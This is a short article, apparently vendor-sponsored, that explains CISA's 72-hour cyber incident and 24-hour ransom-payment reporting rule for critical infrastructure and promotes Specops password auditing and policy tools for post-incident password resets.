Owners and operators of critical infrastructure must file cyber incident reports with CISA within 72 hours. They must report ransom payments for ransomware attacks within 24 hours. Other businesses can take part voluntarily.

The CISA Director can subpoena organizations in noncompliance to compel them to provide information necessary to determine whether a cyber incident happened. The CISA Director can refer the matter to the Attorney General to bring civil action to enforce the subpoena when necessary.

CISA will share data from cyber incident reports, including defensive measures and anonymized cyber threat indicators, with other organizations. The data will inform businesses to adjust security infrastructure, monitor for specific attack PPTs, and block or remediate attacks.

**What CISA's rule means for critical infrastructure businesses**

CISA's rule will enforce fast reporting, which will probably move organizations to speed up investigation and response, so initial reports are timely while showing mitigating actions. The rule will likely result in frequent reporting as the broader list of incidents includes scans and attempted incidents, not just successful intrusions. Unreported incidents and slow reporting can trigger enforcement action from the CISA Director. Organizations will require incident investigation and response to yield more results than in the past.

The rule will force organizations to use every means to tighten and enforce security protocols to reduce the frequency of cyber incidents. Organizations will need additional security rules and policies to reign in attacks; additional steps to enforce those protocols will follow.

Increasing demand for effective cybersecurity will elevate cyber industry competition. Cybersecurity vendors must keep pace with their customers and the new 72-hour timetable as they aid in the investigation, response, and reporting of incidents the rule covers. The market for security analysts and related specialists will grow.

**Getting ahead of CISA's reporting rules now**

CISA emphasizes taking action to mitigate cyber incidents. Response actions include triggering a disaster recovery plan and hunting for network intrusions.

Response actions are challenging even without stringent time constraints. It is common practice for organizations to reset employee passwords after a cyber incident. Password resets are expensive and time-consuming.

Organizations need solutions that ease the process. After an attack, IT can run a free copy of the Specops Password Auditor to generate a password age report to see who changed their passwords. IT can use this information to force a password reset as needed for those who have not manually changed their passwords.

**Password security is essential to protecting critical infrastructure**

Securing passwords with policies and resets safeguards accounts and stops the spread of breaches. For example, unauthorized access to accounts enables criminal hackers to move laterally across the network. Lateral movement lets them take control of additional accounts, including admin accounts, and breach and exfiltrate customer databases and intellectual property. Check out Specops Password Policy if you're looking to beef up your Active Directory password security in order to safeguard against a breach.

Password security is essential to defending critical infrastructure against ransomware attacks. Cybercriminals infected Colonial Pipeline with ransomware in 2021 using a single compromised password.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#intel